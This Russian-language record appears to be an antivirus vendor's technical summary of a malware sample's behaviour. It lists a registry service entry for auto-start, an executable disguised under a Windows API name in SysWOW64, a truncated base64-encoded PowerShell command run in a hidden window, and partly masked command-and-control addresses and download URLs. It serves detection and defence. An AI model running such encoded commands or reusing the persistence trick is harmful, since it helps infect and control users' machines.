Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\api-ms-win-core-processenvironment-l1-1-0] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\api-ms-win-core-processenvironment-l1-1-0] 'ImagePath' = '"%WINDIR%\SysWOW64\api-ms-win-core-processenvironment-l1-1-0\api-ms-win-core-processenvironme...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAHEAbgBkAHMAdQBhAHIAZAB6AD0AJwBUAHgAdwBoAGgAbAB1AHAAbQB1AG8AYQAnADsAJABCAGgAYgBiAGkAYgB6AG4AYwBnAGwAcQAgAD0AIAAnADgAMAA1ACcAOwAkAE8AYgBrAGcAYQBvAHQAeABvAGoAbABiAHUAPQAnAEQAYwB4AG8AaQBiAH...
- %HOMEPATH%\805.exe
- %HOMEPATH%\805.exe
- %HOMEPATH%\805.exe в %WINDIR%\syswow64\api-ms-win-core-processenvironment-l1-1-0\api-ms-win-core-processenvironment-l1-1-0.exe
- %HOMEPATH%\805.exe
- '60.##.240.192':80
- '12#.#39.65.177':80
- '14#.#10.171.237':8080
- http://nv#.##tsmartz.net/zod/gedkhogBs/
- http://14#.###.171.237:8080/cTPRhhh6/3rPsWqyy04a/lHtSYIsZhnD/ via 14#.#10.171.237
- DNS ASK 9j###iss.com
- DNS ASK nv#.##tsmartz.net
- DNS ASK tb########rakat.000webhostapp.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAHEAbgBkAHMAdQBhAHIAZAB6AD0AJwBUAHgAdwBoAGgAbAB1AHAAbQB1AG8AYQAnADsAJABCAGgAYgBiAGkAYgB6AG4AYwBnAGwAcQAgAD0AIAAnADgAMAA1ACcAOwAkAE8AYgBrAGcAYQBvAHQAeABvAGoAbABiAHUAPQAnAEQAYwB4AG8AaQBiAH...' (со скрытым окном)